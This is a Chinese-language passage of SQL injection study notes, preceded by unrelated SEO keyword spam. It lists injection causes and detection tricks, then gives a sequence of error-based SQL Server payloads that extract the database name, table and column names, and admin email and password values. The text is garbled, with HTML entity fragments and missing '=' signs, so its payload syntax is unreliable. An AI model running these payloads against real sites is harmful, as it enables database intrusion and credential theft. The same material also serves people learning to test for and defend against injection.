查询网站所有死链接,做网店在素材网站找的图侵权吗,seo链接优化,智慧企业管理平台Sql注入Sql注入成因#xff1a;1)转义字符处理不当(如’,--,/**/,会截断原有的语句#xff0c;执行新语句)#xff1b;2)类型处理不当(如接受的是整型的参数#xff0c;并没有校验也可以接受字符型数据)3)查询语句的组装不当4)错误处理不当5)权限配置不当(可以执行高权限语…Sql注入Sql注入成因1)转义字符处理不当(如’,--,/**/,会截断原有的语句执行新语句)2)类型处理不当(如接受的是整型的参数并没有校验也可以接受字符型数据)3)查询语句的组装不当4)错误处理不当5)权限配置不当(可以执行高权限语句)Sql注入类型从参数的角度基于字符型和数字型的基于错误的(基于响应时间的盲注基于相应的注入)可以直观的看到我们查询结果的一类看不到查询结果就是盲注识别sql注入1.永真和永假表达式 or 11—2.语句执行的报错信息Having(聚合函数)若select字段没有包含在having里面则会报错证明注入成功3.特定数据的连接符(根据不同数据库的连接符不相同)i.Sqlsever(连接)1’or ‘ab’’a’’b’—(永真)ii.Mysql(空格连接)1’or ‘ab’’a’’b’ (永真)iii.奥瑞考(||连接)1’or ‘ab’’a’||’b’基于错误的sql注入基本原理1.判断2.判断数据库Sqlsever数据库中convert是一个进行类型转换的函数1convert(int,version)--拆解库名1convert(int,db_name())--得到当前用户名1convert(int,user_name())—拆解表名1convert(int,(select top 1 table_name from information_schema_tables))—1convert(int,(select top 1 table_name from information_schema.tables where table_name not in(‘pp_category’)))—not in排除第一次选中的表名就可以得到第二个表名以此类推拆解列名1convert(int,(select top 1 column_name from information_schema.columns where table_name’pp_admin_tb’))—1convert(int,(select top 1 column_name from information_schema_columns where table_name’pp_admin_tb’and column_name not in(‘adminsign_id’)))—得到字段数据1convert(int,(select top 1 email_id from pp_admin_tb))—得到字段数据;1convert(int,(select top 1 password from pp_admin_tb))—
